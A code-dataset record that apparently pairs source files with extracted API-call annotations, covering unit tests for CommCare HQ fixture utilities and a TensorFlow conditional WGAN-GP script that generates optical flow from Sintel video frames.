"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((258, 315), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (289, 315), False, 'from django.db import models, migrations\n'), ((1484, 1530), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""reviews.StudySelection"""'}), "(to='reviews.StudySelection')\n", (1501, 1530), False, 'from django.db import models, migrations\n'), ((493, 586), 'django.db.models.AutoField', 'models.AutoField', ([], {'verbose_name': '"""ID"""', 'serialize': '(False)', 'auto_created': '(True)', 'primary_key': '(True)'}), "(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)\n", (509, 586), False, 'from django.db import models, migrations\n'), ((612, 751), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""U"""', 'max_length': '(1)', 'choices': "[('U', 'Unclassified'), ('R', 'Rejected'), ('A', 'Accepted'), ('D',\n 'Duplicated')]"}), "(default='U', max_length=1, choices=[('U', 'Unclassified'),\n ('R', 'Rejected'), ('A', 'Accepted'), ('D', 'Duplicated')])\n", (628, 751), False, 'from django.db import models, migrations\n'), ((781, 816), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (801, 816), False, 'from django.db import models, migrations\n'), ((848, 888), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""library.Document"""'}), "(to='library.Document')\n", (865, 888), False, 'from django.db import models, migrations\n'), ((1028, 1121), 'django.db.models.AutoField', 'models.AutoField', ([], {'verbose_name': '"""ID"""', 'serialize': '(False)', 'auto_created': '(True)', 'primary_key': '(True)'}), "(verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)\n", (1044, 1121), False, 'from django.db import models, migrations\n'), ((1153, 1187), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (1172, 1187), False, 'from django.db import models, migrations\n'), ((1217, 1255), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': '"""reviews.Review"""'}), "(to='reviews.Review')\n", (1234, 1255), False, 'from django.db import models, migrations\n'), ((1283, 1340), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': 'settings.AUTH_USER_MODEL', 'null': '(True)'}), '(to=settings.AUTH_USER_MODEL, null=True)\n', (1300, 1340), False, 'from django.db import models, migrations\n')] |
import doctest
from nose.tools import assert_equal, assert_true
from corehq.apps.fixtures.models import (
FieldList,
FixtureDataItem,
FixtureItemField,
)
from custom.abt.reports import fixture_utils
from custom.abt.reports.fixture_utils import (
dict_values_in,
fixture_data_item_to_dict,
)
def test_dict_values_in_param_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, None)
assert_true(result)
def test_dict_values_in_param_empty():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {})
assert_true(result)
def test_dict_values_in_value_none():
swallow = {'permutation': 'unladen'}
result = dict_values_in(swallow, {'permutation': None})
assert_true(result)
def test_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='789abc',
properties={}
)
]
),
'name': FieldList(
doc_type='FieldList',
field_list=[
FixtureItemField(
doc_type='FixtureItemField',
field_value='John',
properties={'lang': 'en'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jan',
properties={'lang': 'nld'}
),
FixtureItemField(
doc_type='FixtureItemField',
field_value='Jean',
properties={'lang': 'fra'}
),
]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': '789abc',
'name': 'John'
})
def test_empty_fixture_data_item_to_dict():
data_item = FixtureDataItem(
domain='test-domain',
data_type_id='123456',
fields={
'id': FieldList(
doc_type='FieldList',
field_list=[]
),
'name': FieldList(
doc_type='FieldList',
field_list=[]
)
}
)
dict_ = fixture_data_item_to_dict(data_item)
assert_equal(dict_, {
'id': None,
'name': None,
})
def test_doctests():
results = doctest.testmod(fixture_utils)
assert results.failed == 0
| [
"corehq.apps.fixtures.models.FieldList",
"nose.tools.assert_true",
"custom.abt.reports.fixture_utils.dict_values_in",
"doctest.testmod",
"custom.abt.reports.fixture_utils.fixture_data_item_to_dict",
"nose.tools.assert_equal",
"corehq.apps.fixtures.models.FixtureItemField"
] | [((407, 436), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', 'None'], {}), '(swallow, None)\n', (421, 436), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((441, 460), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (452, 460), False, 'from nose.tools import assert_equal, assert_true\n'), ((556, 583), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', '{}'], {}), '(swallow, {})\n', (570, 583), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((588, 607), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (599, 607), False, 'from nose.tools import assert_equal, assert_true\n'), ((702, 748), 'custom.abt.reports.fixture_utils.dict_values_in', 'dict_values_in', (['swallow', "{'permutation': None}"], {}), "(swallow, {'permutation': None})\n", (716, 748), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((753, 772), 'nose.tools.assert_true', 'assert_true', (['result'], {}), '(result)\n', (764, 772), False, 'from nose.tools import assert_equal, assert_true\n'), ((2033, 2069), 'custom.abt.reports.fixture_utils.fixture_data_item_to_dict', 'fixture_data_item_to_dict', (['data_item'], {}), '(data_item)\n', (2058, 2069), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((2074, 2127), 'nose.tools.assert_equal', 'assert_equal', (['dict_', "{'id': '789abc', 'name': 'John'}"], {}), "(dict_, {'id': '789abc', 'name': 'John'})\n", (2086, 2127), False, 'from nose.tools import assert_equal, assert_true\n'), ((2560, 2596), 'custom.abt.reports.fixture_utils.fixture_data_item_to_dict', 'fixture_data_item_to_dict', (['data_item'], {}), '(data_item)\n', (2585, 2596), False, 'from custom.abt.reports.fixture_utils import dict_values_in, fixture_data_item_to_dict\n'), ((2601, 2648), 'nose.tools.assert_equal', 'assert_equal', (['dict_', "{'id': None, 'name': None}"], {}), "(dict_, {'id': None, 'name': None})\n", (2613, 2648), False, 'from nose.tools import assert_equal, assert_true\n'), ((2709, 2739), 'doctest.testmod', 'doctest.testmod', (['fixture_utils'], {}), '(fixture_utils)\n', (2724, 2739), False, 'import doctest\n'), ((2325, 2371), 'corehq.apps.fixtures.models.FieldList', 'FieldList', ([], {'doc_type': '"""FieldList"""', 'field_list': '[]'}), "(doc_type='FieldList', field_list=[])\n", (2334, 2371), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((2439, 2485), 'corehq.apps.fixtures.models.FieldList', 'FieldList', ([], {'doc_type': '"""FieldList"""', 'field_list': '[]'}), "(doc_type='FieldList', field_list=[])\n", (2448, 2485), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1040, 1126), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""789abc"""', 'properties': '{}'}), "(doc_type='FixtureItemField', field_value='789abc',\n properties={})\n", (1056, 1126), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1368, 1464), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""John"""', 'properties': "{'lang': 'en'}"}), "(doc_type='FixtureItemField', field_value='John',\n properties={'lang': 'en'})\n", (1384, 1464), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1576, 1673), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""Jan"""', 'properties': "{'lang': 'nld'}"}), "(doc_type='FixtureItemField', field_value='Jan', properties\n ={'lang': 'nld'})\n", (1592, 1673), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n'), ((1784, 1881), 'corehq.apps.fixtures.models.FixtureItemField', 'FixtureItemField', ([], {'doc_type': '"""FixtureItemField"""', 'field_value': '"""Jean"""', 'properties': "{'lang': 'fra'}"}), "(doc_type='FixtureItemField', field_value='Jean',\n properties={'lang': 'fra'})\n", (1800, 1881), False, 'from corehq.apps.fixtures.models import FieldList, FixtureDataItem, FixtureItemField\n')] |
import os, sys
sys.path.append(os.getcwd())
import time
import numpy as np
import tensorflow as tf
import tflib as lib
import tflib.ops.linear
import tflib.ops.conv2d
import tflib.ops.batchnorm
import tflib.ops.deconv2d
import tflib.save_images
import tflib.plot
import tflib.flow_handler as fh
import tflib.SINTELdata as sintel
MODE = 'wgan-gp' # Valid options are dcgan, wgan, or wgan-gp
DIM = 64 # This overfits substantially; you're probably better off with 64 # or 128?
LAMBDA = 10 # Gradient penalty lambda hyperparameter
CRITIC_ITERS = 5 # How many critic iterations per generator iteration
BATCH_SIZE = 64 # Batch size
ITERS = 100000 # How many generator iterations to train for # 200000 takes too long
IM_DIM = 32 # number of pixels along x and y (square assumed)
SQUARE_IM_DIM = IM_DIM*IM_DIM # 32*32 = 1024
OUTPUT_DIM = IM_DIM*IM_DIM*3 # Number of pixels (3*32*32) - rgb color
OUTPUT_DIM_FLOW = IM_DIM*IM_DIM*2 # Number of pixels (2*32*32) - uv direction
CONTINUE = False # Default False, set True if restoring from checkpoint
START_ITER = 0 # Default 0, set accordingly if restoring from checkpoint (100, 200, ...)
CURRENT_PATH = "sintel/flowcganuv5"
restore_path = "/home/linkermann/opticalFlow/opticalFlowGAN/results/" + CURRENT_PATH + "/model.ckpt"
lib.print_model_settings(locals().copy())
if(CONTINUE):
tf.reset_default_graph()
def LeakyReLU(x, alpha=0.2):
return tf.maximum(alpha*x, x)
def ReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)
return tf.nn.relu(output)
def LeakyReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(name+'.Linear', n_in, n_out, inputs)
return LeakyReLU(output)
def Generator(n_samples, conditions, noise=None): # input conds additional to noise
if noise is None:
noise = tf.random_normal([n_samples, SQUARE_IM_DIM])
noise = tf.reshape(noise, [n_samples, 1, IM_DIM, IM_DIM])
# new conditional input: last frames
conds = tf.reshape(conditions, [n_samples, 6, IM_DIM, IM_DIM]) # conditions: (64,2*3072) TO conds: (64,6,32,32)
# for now just concat the inputs: noise as seventh dim of cond image
output = tf.concat([noise, conds], 1) # to: (BATCH_SIZE,7,32,32)
output = tf.reshape(output, [n_samples, SQUARE_IM_DIM*7]) # 32x32x4 = 4096; to: (BATCH_SIZE, 4096)
output = lib.ops.linear.Linear('Generator.Input', SQUARE_IM_DIM*7, 4*4*4*DIM, output) # 4*4*4*DIM = 64*64 = 4096
output = lib.ops.batchnorm.Batchnorm('Generator.BN1', [0], output)
output = tf.nn.relu(output)
output = tf.reshape(output, [-1, 4*DIM, 4, 4])
output = lib.ops.deconv2d.Deconv2D('Generator.2', 4*DIM, 2*DIM, 5, output)
output = lib.ops.batchnorm.Batchnorm('Generator.BN2', [0,2,3], output)
output = tf.nn.relu(output)
output = lib.ops.deconv2d.Deconv2D('Generator.3', 2*DIM, DIM, 5, output)
output = lib.ops.batchnorm.Batchnorm('Generator.BN3', [0,2,3], output)
output = tf.nn.relu(output)
output = lib.ops.deconv2d.Deconv2D('Generator.5', DIM, 2, 5, output) # output flow in color --> dim is 2
output = tf.tanh(output)
return tf.reshape(output, [-1, OUTPUT_DIM_FLOW]) # output flow --> dim is 2
def Discriminator(inputs, conditions): # input conds as well
inputs = tf.reshape(inputs, [-1, 2, IM_DIM, IM_DIM]) # input flow --> dim is 2
conds = tf.reshape(conditions, [-1, 6, IM_DIM, IM_DIM]) # new conditional input: last frames
# for now just concat the inputs
ins = tf.concat([inputs, conds], 1) #to: (BATCH_SIZE, 8, 32, 32)
output = lib.ops.conv2d.Conv2D('Discriminator.1', 8, DIM, 5, ins, stride=2) # first dim is different: 8 now
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.2', DIM, 2*DIM, 5, output, stride=2)
if MODE != 'wgan-gp':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DIM, 4*DIM, 5, output, stride=2)
if MODE != 'wgan-gp':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)
output = LeakyReLU(output)
#output = lib.ops.conv2d.Conv2D('Discriminator.4', 4*DIM, 8*DIM, 5, output, stride=2)
# if MODE != 'wgan-gp':
# output = lib.ops.batchnorm.Batchnorm('Discriminator.BN4', [0,2,3], output)
# output = LeakyReLU(output)
output = tf.reshape(output, [-1, 4*4*8*DIM]) # adjusted outcome
output = lib.ops.linear.Linear('Discriminator.Output', 4*4*8*DIM, 1, output)
return tf.reshape(output, [-1])
cond_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, 2*OUTPUT_DIM]) # cond input for G and D, 2 frames!
cond_data = 2*((tf.cast(cond_data_int, tf.float32)/255.)-.5) #normalized [-1,1]!
#real_data_int = tf.placeholder(tf.int32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW]) # real data is flow, dim 2!
real_data = tf.placeholder(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW]) #already float, normalized [-1,1]!
fake_data = Generator(BATCH_SIZE, cond_data)
disc_real = Discriminator(real_data, cond_data)
disc_fake = Discriminator(fake_data, cond_data)
gen_params = lib.params_with_name('Generator')
disc_params = lib.params_with_name('Discriminator')
if MODE == 'wgan':
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
gen_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.RMSPropOptimizer(learning_rate=5e-5).minimize(disc_cost, var_list=disc_params)
clip_ops = []
for var in disc_params:
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
clip_disc_weights = tf.group(*clip_ops)
elif MODE == 'wgan-gp':
# Standard WGAN loss
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
# Gradient penalty
alpha = tf.random_uniform(
shape=[BATCH_SIZE,1],
minval=0.,
maxval=1.
)
differences = fake_data - real_data
interpolates = real_data + (alpha*differences)
gradients = tf.gradients(Discriminator(interpolates, cond_data), [interpolates])[0] #added cond here
slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes-1.)**2)
disc_cost += LAMBDA*gradient_penalty
gen_train_op = tf.train.AdamOptimizer(learning_rate=1e-4, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.AdamOptimizer(learning_rate=1e-4, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_params)
elif MODE == 'dcgan':
gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(disc_fake, tf.ones_like(disc_fake)))
disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(disc_fake, tf.zeros_like(disc_fake)))
disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(disc_real, tf.ones_like(disc_real)))
disc_cost /= 2.
gen_train_op = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(gen_cost,
var_list=lib.params_with_name('Generator'))
disc_train_op = tf.train.AdamOptimizer(learning_rate=2e-4, beta1=0.5).minimize(disc_cost,
var_list=lib.params_with_name('Discriminator.'))
# Dataset iterators
gen = sintel.load_train_gen(BATCH_SIZE, (IM_DIM,IM_DIM,3), (IM_DIM,IM_DIM,2)) # batch size, im size, im size flow
dev_gen = sintel.load_test_gen(BATCH_SIZE, (IM_DIM,IM_DIM,3), (IM_DIM,IM_DIM,2))
# For generating samples: define fixed noise and conditional input
fixed_cond_samples, fixed_flow_samples = next(gen) # shape: (batchsize, 3072)
fixed_cond_data_int = fixed_cond_samples[:,0:2*OUTPUT_DIM] # earlier frames as condition, cond samples shape (64,3*3072)
fixed_real_data = fixed_flow_samples[:,OUTPUT_DIM_FLOW:] # later flow for discr, flow samples shape (64,2048)
fixed_real_data_norm01 = tf.cast(fixed_real_data+1.0, tf.float32)/2.0 # [0,1]
fixed_cond_data_normalized = 2*((tf.cast(fixed_cond_data_int, tf.float32)/255.)-.5) #normalized [-1,1]!
fixed_viz_data_int = fixed_cond_samples[:,OUTPUT_DIM:2*OUTPUT_DIM] # each later frame for viz
if(CONTINUE):
fixed_noise = tf.get_variable("noise", shape=[BATCH_SIZE, SQUARE_IM_DIM]) # take same noise like saved model
else:
fixed_noise = tf.Variable(tf.random_normal(shape=[BATCH_SIZE, SQUARE_IM_DIM], dtype=tf.float32), name='noise') #variable: saved, for additional channel
fixed_noise_samples = Generator(BATCH_SIZE, fixed_cond_data_normalized, noise=fixed_noise) # Generator(n_samples,conds, noise):
def generate_image(frame, true_dist): # generates 64 (batch-size) samples next to each other in one image!
print("Iteration %d : \n" % frame)
samples = session.run(fixed_noise_samples, feed_dict={real_data: fixed_real_data, cond_data_int: fixed_cond_data_int}) # output range (-1.0,1.0), size=(BATCH_SIZE, OUT_DIM)
#samples_255 = ((samples+1.)*(255./2)).astype('int32') #(-1,1) to [0,255] for displaying
samples_01 = ((samples+1.)/2.).astype('float32') # [0,1] is a np.ndarray shape (64, 2048)
# print(fixed_real_data_norm01.eval()) # shape (64, 2048) # bigger areas with (almost) same flow
images2show = fixed_viz_data_int.reshape(BATCH_SIZE,3,IM_DIM,IM_DIM)
sample_flowimages, real_flowimages = [], []
for i in range(0, BATCH_SIZE):
real_flowimg, flowimg = [],[] # reset to be sure
flowimg = fh.computeFlowImg(samples[i,:].reshape((IM_DIM,IM_DIM,2))) # (32, 32, 3) # now color img!! :)
flowimg_T = np.transpose(flowimg, [2,0,1]) # (3, 32, 32)
# flowimage = flowimage_T.reshape((OUTPUT_DIM,)) # instead of flatten?
sample_flowimages.append(flowimg_T)
real_uvflow = fixed_real_data[i,:]
real_uvflow = real_uvflow.reshape((IM_DIM,IM_DIM,2))
real_flowimg = fh.computeFlowImg(real_uvflow) # (32, 32, 3) color img!
real_flowimg = real_flowimg.reshape(IM_DIM,IM_DIM,3).astype('int32') # (32, 32, 3)
real_flowimg_T = np.transpose(real_flowimg, [2,0,1]) # (3, 32, 32)
real_flowimages.append(real_flowimg_T) # or which one? # also save as .flo?
images2show = np.insert(images2show, i*2+1, flowimg_T, axis=0)
#samples_255[2*i+1,:] = flowimage # sample flow color image
# images2show.shape: (128, 3, 32, 32) = (2*BATCH_SIZE, 3, IM_DIM, IM_DIM)
# images.reshape((2*BATCH_SIZE, 3, IM_DIM, IM_DIM))
lib.save_images.save_images(images2show, 'samples_{}.jpg'.format(frame))
sample_flowims_np = np.asarray(sample_flowimages, np.int32)
real_flowims_np = np.asarray(real_flowimages, np.int32)
sample_flowims = tf.convert_to_tensor(sample_flowims_np, np.int32)
real_flowims = tf.convert_to_tensor(real_flowims_np, np.int32) # turn into tensor to reshape later
# tensor = tf.constant(np_array) # another way to create a tensor
# compare generated flow to real one # float..?
# u-v-component wise
real = tf.reshape(fixed_real_data_norm01, [BATCH_SIZE,IM_DIM,IM_DIM,2]) # use tf.reshape! Tensor! batch!
real_u = tf.slice(real, [0,0,0,0], [real.get_shape()[0],real.get_shape()[1],real.get_shape()[2], 1])
real_v = tf.slice(real, [0,0,0,1], [real.get_shape()[0],real.get_shape()[1],real.get_shape()[2], 1])
pred = tf.reshape(samples_01,[BATCH_SIZE,IM_DIM,IM_DIM,2]) # use tf reshape!
pred_u = tf.slice(pred, [0,0,0,0], [pred.get_shape()[0],pred.get_shape()[1],pred.get_shape()[2], 1])
pred_v = tf.slice(pred, [0,0,0,1], [pred.get_shape()[0],pred.get_shape()[1],pred.get_shape()[2], 1]) # shape (64, 32, 32) all of them
# mse & ssim on components
mseval_per_entry_u = tf.keras.metrics.mse(real_u, pred_u) # on gray, on [0,1], (64,32,32), small vals (^-1,-2,-3)
mseval_u = tf.reduce_mean(mseval_per_entry_u, [1,2]) # shape (64,) # diff numbers
mseval_per_entry_v = tf.keras.metrics.mse(real_v, pred_v) # on gray, on [0,1], (64,32,32), small vals (^-1,-2,-3)
mseval_v = tf.reduce_mean(mseval_per_entry_v, [1,2]) # shape (64,) # diff than per u entry
#ssimval_u = tf.image.ssim(real_u, pred_u, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,)
#ssimval_v = tf.image.ssim(real_v, pred_v, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,) # also minus vals, around 0, u and v differ
# avg: add and divide by 2
mseval_uv = tf.add(mseval_u, mseval_v) # tf.cast neccessary?
tensor2 = tf.constant(2.0, shape=[64])
#ssimval_uv = tf.add(ssimval_u, ssimval_v) # (64,)
mseval_uv = tf.div(mseval_uv, tensor2)
#ssimval_uv = tf.div(ssimval_uv, tensor2) # (64,), small around 0, up to 0.3 after first 100 iter
#ssimval_list_uv = ssimval_uv.eval() # to numpy array # (64,)
mseval_list_uv = mseval_uv.eval() # (64,)
print("mseval uv")
print(mseval_list_uv)
#print("ssimval uv")
#print(ssimval_list_uv)
# flow color ims to gray
real_flowims = tf.cast(real_flowims, tf.float32)/255. # to [0,1]
real_color = tf.reshape(real_flowims, [BATCH_SIZE,IM_DIM,IM_DIM,3])
real_gray = tf.image.rgb_to_grayscale(real_color) # tensor batch to gray; returns original dtype = float [0,1]
# print("real gray") # (64, 32, 32, 1)
sample_flowims = tf.cast(sample_flowims, tf.float32)/255. # to [0,1]
pred_color = tf.reshape(sample_flowims, [BATCH_SIZE,IM_DIM,IM_DIM,3]) # use tf.reshape! Tensor! batch!
pred_gray = tf.image.rgb_to_grayscale(pred_color) # (64, 32, 32, 1)
# mse & ssim on grayscale
mseval_per_entry_rgb = tf.keras.metrics.mse(real_gray, pred_gray) # on grayscale, on [0,1]..
mseval_rgb = tf.reduce_mean(mseval_per_entry_rgb, [1,2])
#ssimval_rgb = tf.image.ssim(real_gray, pred_gray, max_val=1.0) # in: tensor 64-batch, out: tensor ssimvals (64,)
#ssimval_list_rgb = ssimval_rgb.eval() # to numpy array # (64,)
mseval_list_rgb = mseval_rgb.eval() # (64,)
print("mseval rgb")
print(mseval_list_rgb)
#print("ssimval rgb")
#print(ssimval_list_rgb)
# print(ssimval_list)
# print(mseval_list)
for i in range (0,3):
#lib.plot.plot('SSIM uv for sample %d' % (i+1), ssimval_list_uv[i])
#lib.plot.plot('SSIM rgb for sample %d' % (i+1), ssimval_list_rgb[i])
lib.plot.plot('MSE uv for sample %d' % (i+1), mseval_list_uv[i])
lib.plot.plot('MSE rgb for sample %d' % (i+1), mseval_list_rgb[i])
print("sample %d \t MSE: %.5f \t %.5f\r\n" % (i, mseval_list_uv[i], mseval_list_rgb[i]))
#SSIM: %.5f \t %.5f\r\n" % (i, mseval_list_uv[i], mseval_list_rgb[i], ssimval_list_uv[i], ssimval_list_rgb[i]))
init_op = tf.global_variables_initializer() # op to initialize the variables.
saver = tf.train.Saver() # ops to save and restore all the variables.
# Train loop
with tf.Session() as session:
if(CONTINUE):
# Restore variables from disk.
saver.restore(session, restore_path)
print("Model restored.")
lib.plot.restore(START_ITER) # does not fully work, but makes plots start from newly started iteration
else:
session.run(init_op)
for iteration in range(START_ITER, ITERS): # START_ITER: 0 or from last checkpoint
start_time = time.time()
# Train generator
if iteration > 0:
_data, _ = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument not needed
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier frames as conditional data, # flow for disc not needed here
_ = session.run(gen_train_op, feed_dict={cond_data_int: _cond_data})
# Train critic
if MODE == 'dcgan':
disc_iters = 1
else:
disc_iters = CRITIC_ITERS
for i in range(disc_iters):
_data, _flow = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier 2 frames as conditional data,
_real_data = _flow[:,OUTPUT_DIM_FLOW:] # later flow as real data for discriminator
_disc_cost, _ = session.run([disc_cost, disc_train_op], feed_dict={real_data: _real_data, cond_data_int: _cond_data})
if MODE == 'wgan':
_ = session.run(clip_disc_weights)
lib.plot.plot('train disc cost', _disc_cost)
lib.plot.plot('time', time.time() - start_time)
# Calculate dev loss and generate samples every 100 iters
if iteration % 100 == 99:
dev_disc_costs = []
_data, _flow = next(gen) # shape: (batchsize, 6144), double output_dim now # flow as second argument
_cond_data = _data[:, 0:2*OUTPUT_DIM] # earlier 2 frames as conditional data
_real_data = _flow[:,OUTPUT_DIM_FLOW:] # later flow as real data for discriminator
_dev_disc_cost = session.run(disc_cost, feed_dict={real_data: _real_data, cond_data_int: _cond_data})
dev_disc_costs.append(_dev_disc_cost)
lib.plot.plot('dev disc cost', np.mean(dev_disc_costs))
generate_image(iteration, _data)
# Save the variables to disk.
save_path = saver.save(session, restore_path)
print("Model saved in path: %s" % save_path)
# chkp.print_tensors_in_checkpoint_file("model.ckpt", tensor_name='', all_tensors=True)
# Save logs every 100 iters
if (iteration < 5) or (iteration % 100 == 99):
lib.plot.flush()
lib.plot.tick()
| [
"tensorflow.div",
"tflib.plot.plot",
"tensorflow.get_variable",
"tensorflow.tanh",
"tensorflow.group",
"tflib.ops.linear.Linear",
"tflib.ops.deconv2d.Deconv2D",
"tensorflow.reduce_mean",
"tensorflow.ones_like",
"tensorflow.cast",
"numpy.mean",
"tensorflow.random_normal",
"tflib.ops.conv2d.Co... | [((4611, 4671), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32'], {'shape': '[BATCH_SIZE, 2 * OUTPUT_DIM]'}), '(tf.int32, shape=[BATCH_SIZE, 2 * OUTPUT_DIM])\n', (4625, 4671), True, 'import tensorflow as tf\n'), ((4908, 4971), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[BATCH_SIZE, OUTPUT_DIM_FLOW]'}), '(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM_FLOW])\n', (4922, 4971), True, 'import tensorflow as tf\n'), ((5163, 5196), 'tflib.params_with_name', 'lib.params_with_name', (['"""Generator"""'], {}), "('Generator')\n", (5183, 5196), True, 'import tflib as lib\n'), ((5211, 5248), 'tflib.params_with_name', 'lib.params_with_name', (['"""Discriminator"""'], {}), "('Discriminator')\n", (5231, 5248), True, 'import tflib as lib\n'), ((7640, 7715), 'tflib.SINTELdata.load_train_gen', 'sintel.load_train_gen', (['BATCH_SIZE', '(IM_DIM, IM_DIM, 3)', '(IM_DIM, IM_DIM, 2)'], {}), '(BATCH_SIZE, (IM_DIM, IM_DIM, 3), (IM_DIM, IM_DIM, 2))\n', (7661, 7715), True, 'import tflib.SINTELdata as sintel\n'), ((7758, 7832), 'tflib.SINTELdata.load_test_gen', 'sintel.load_test_gen', (['BATCH_SIZE', '(IM_DIM, IM_DIM, 3)', '(IM_DIM, IM_DIM, 2)'], {}), '(BATCH_SIZE, (IM_DIM, IM_DIM, 3), (IM_DIM, IM_DIM, 2))\n', (7778, 7832), True, 'import tflib.SINTELdata as sintel\n'), ((14938, 14971), 'tensorflow.global_variables_initializer', 'tf.global_variables_initializer', ([], {}), '()\n', (14969, 14971), True, 'import tensorflow as tf\n'), ((15016, 15032), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (15030, 15032), True, 'import tensorflow as tf\n'), ((31, 42), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (40, 42), False, 'import os, sys\n'), ((1332, 1356), 'tensorflow.reset_default_graph', 'tf.reset_default_graph', ([], {}), '()\n', (1354, 1356), True, 'import tensorflow as tf\n'), ((1398, 1422), 'tensorflow.maximum', 'tf.maximum', (['(alpha * x)', 'x'], {}), '(alpha * x, x)\n', (1408, 1422), True, 'import tensorflow as tf\n'), ((1477, 1537), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (["(name + '.Linear')", 'n_in', 'n_out', 'inputs'], {}), "(name + '.Linear', n_in, n_out, inputs)\n", (1498, 1537), True, 'import tflib as lib\n'), ((1547, 1565), 'tensorflow.nn.relu', 'tf.nn.relu', (['output'], {}), '(output)\n', (1557, 1565), True, 'import tensorflow as tf\n'), ((1627, 1687), 'tflib.ops.linear.Linear', 'lib.ops.linear.Linear', (["(name + '.Linear')", 'n_in', 'n_out', 'inputs'], {}), "(name + '.Linear', n_in, n_out, inputs)\n", (1648, 1687), True, 'import tflib as lib\n'), ((1897, 1946), 'tensorflow.reshape', 'tf.reshape', (['noise', '[n_samples, 1, IM_DIM, IM_DIM]'], {}), '(noise, [n_samples, 1, IM_DIM, IM_DIM])\n', (1907, 1946), True, 'import tensorflow as tf\n'), ((2000, 2054), 'tensorflow.reshape', 'tf.reshape', (['conditions', '[n_samples, 6, IM_DIM, IM_DIM]'], {}), '(conditions, [n_samples, 6, IM_DIM, IM_DIM])\n', (2010, 2054), True, 'import tensorflow as tf\n'), ((2193, 2221), 'tensorflow.concat', 'tf.concat', (['[noise, conds]', '(1)'], {}), 